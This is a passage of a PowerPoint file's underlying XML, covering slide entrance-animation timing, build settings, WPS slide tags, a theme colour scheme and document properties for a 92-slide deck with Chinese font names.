                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="69" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="43"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="70" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="43"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="71" presetID="53" presetClass="entr" presetSubtype="16" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="400"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="72" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="44"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="73" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="44"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="74" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="44"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="75" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="44"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="76" presetID="53" presetClass="entr" presetSubtype="16" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="100"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="77" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="45"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="78" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="45"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="79" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="45"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="80" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="45"/>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47"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="83" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="84" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="85" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="86" presetID="53" presetClass="entr" presetSubtype="16" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="300"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="87" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="48"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="88" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="89" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="90" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="91" presetID="53" presetClass="entr" presetSubtype="16" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="400"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="92" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="50"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="93" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="50"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="94" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="50"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="95" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="50"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="96" presetID="53" presetClass="entr" presetSubtype="16" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="100"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="97" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="30"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="98" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="30"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="99" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="30"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="100"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6" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="28" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="29" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="31" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="32" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="34" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="36" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="37" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="38" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="40" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="41" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="43" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="44" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="45" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="47" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="48" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="50" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="30"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f48c1ab2-75b5-4180-bb88-3ddfcb131bc8"/>
  <p:tag name="COMMONDATA" val="eyJoZGlkIjoiNTM3YjI5NzZjOWU2M2I4MjEyNzlmMTc2MjdkM2ViYzcifQ=="/>
</p:tagLst>
</file>

<file path=ppt/tags/tag1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14.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15.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1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1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1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ags/tag1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2.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_SLIDE_MODEL_TYPE" val="numdgm"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag20.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21.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22.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2"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE" val="1"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag23.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3.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_SLIDE_MODEL_TYPE" val="numdgm"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag4.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_SLIDE_MODEL_TYPE" val="numdgm"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag5.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_SLIDE_MODEL_TYPE" val="numdgm"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag6.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2"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE" val="1"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag7.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2"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE" val="1"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag8.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Lst>
</file>

<file path=ppt/tags/tag9.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_UNIT_FILL_FORE_SCHEMECOLOR_INDEX_BRIGHTNESS" val="0"/>
  <p:tag name="KSO_WM_UNIT_FILL_FORE_SCHEMECOLOR_INDEX" val="9"/>
  <p:tag name="KSO_WM_UNIT_FILL_TYPE" val="1"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX_BRIGHTNESS" val="0"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="2"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE" val="1"/>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a:themeElements>
    <a:clrScheme name="">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="F9F9F9"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="FFFFFF"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="C32E24"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="D8572A"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="DB7C23"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="CE6B45"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="8A0012"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="F7B535"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="304FFE"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="492067"/>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TotalTime>
  <Words>10225</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>1000</Paragraphs>
  <Slides>92</Slides>
  <Notes>29</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92</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="103" baseType="lpstr">
      <vt:lpstr>黑体</vt:lpstr>
      <vt:lpstr>Microsoft YaHei</vt:lpstr>
      <vt:lpstr>Microsoft YaHei</vt:lpstr>
      <vt:lpstr>微软雅黑 Light</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Rockwell</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office</vt:lpstr>
      <vt:lpstr>1_Office</vt:lpstr>
      <vt:lpstr>Hello All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d36903</cp:lastModifiedBy>
  <cp:revision>376</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-12-17T01:46:50Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-09-01T14:26:55Z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2052-6.3.0.8471</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="ICV">
    <vt:lpwstr>1E7B135B77D141BBAC8CE70FA0130FE1</vt:lpwstr>
  </property>
</Properties>
</file>